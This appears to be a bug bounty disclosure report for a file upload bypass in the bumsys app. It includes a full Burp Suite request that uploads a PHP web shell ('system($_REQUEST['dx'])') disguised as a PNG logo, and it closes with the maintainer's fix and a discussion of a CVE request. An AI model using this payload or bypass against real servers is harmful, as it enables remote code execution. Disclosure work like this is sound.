File Upload Type Validation Error in unilogies/bumsys
Reported on
Jan 19th 2023
Description
The application does not properly validate the file type or extension during the upload process, allowing any authenticated user to bypass it .
Steps_TO_Reproduce
- Navigate to this URL:[https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)
- Click on action button to edit the Profile
- Click on select logo button to upload the image
- Intercept the POST Request and do the below changes .
Proof of Concept
- Since the Application allow only jpeg, jpg, png image type to upload.
- So The Following request was modified to allow uploading php file to bypass the check , Since the Application is only validating the Content-type not the extension of the file.
Burpsuite-Request
POST /xhr/?module=settings&page=updateShop HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7
Content-Length: 1280
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/settings/shop-list/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopName"
TEST
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopAddress"
test
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCity"
testcity
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopState"
teststate
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPostalCode"
700056
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCountry"
testIND
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPhone"
895623122
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopEmail"
test@gmail.com
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopInvoiceFooter"
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"
Content-Type: image/png
<?php echo system($_REQUEST['dx']); ?>
Burpsuite-Response
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2023 07:14:26 GMT
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65
<div class='alert alert-success'>Shop successfully updated.</div>
VIDEO_POC
https://drive.google.com/drive/folders/1FjCIRSSimDherYajo1X8Sm-8voDBkITH?usp=sharing
Impact
Since the application is not properly validating the file extension and a PHP file is uploaded, it could potentially allow an attacker to execute arbitrary code on the server.
References
@ctflearner, Thank you so much for the report. It is really admirable work.
By the way, Is there any virus on that PHP file? I do not think so, but my system is detecting as a virus.!
Looking forward to hearing from you.
So, should I validate file extension instead of file type or both? What would be the best solution for this? Thanks.
@khurshid Alam , talking about the PHP file, it doesn't contain virus
Talking about the validation , you should implement both
@ctflearner, I have updated the issue on https://demo.bumsys.org/. Could you please confirm is it fixed or not? So, I can update the repo.
Thank you.
@khurshid Alam , The above issue is fixed but you have to to implement one extra thing " Obfuscating file extensions" here is the Link to a Resources " https://portswigger.net/web-security/file-upload" that you can look into it and fix the issue
@ khurshid Alam . I would be glad if you could assign a CVE for this
@ctflearner, Thank you for confirming. Let me heck the article.
I Think Obfuscating file extensions is not applicable here. Could please check code and let me know if it is okay?
Yes, It is okay , kindly look into my request for CVE for this
You can contact the huntr-dev for CVE related issue from your ends , I cannot do anything from myside , check the policy( https://huntr.dev/policy/ ) or mail them how to assign CVE . Thanks
I think in this platform Your CVE category is set to "NO" , if you could change from "NO " to "yes", I mean " CVE : YES " then it will be easy for you to assign CVE to a researcher
You can Refer to this Website: https://www.cve.org/PartnerInformation/ListofPartners/partner/@huntrdev and please let me know if you have any issue or query
And if you want to see the Reference of the CVE Report you can visit the below link https://nvd.nist.gov/vuln/detail/CVE-2022-4506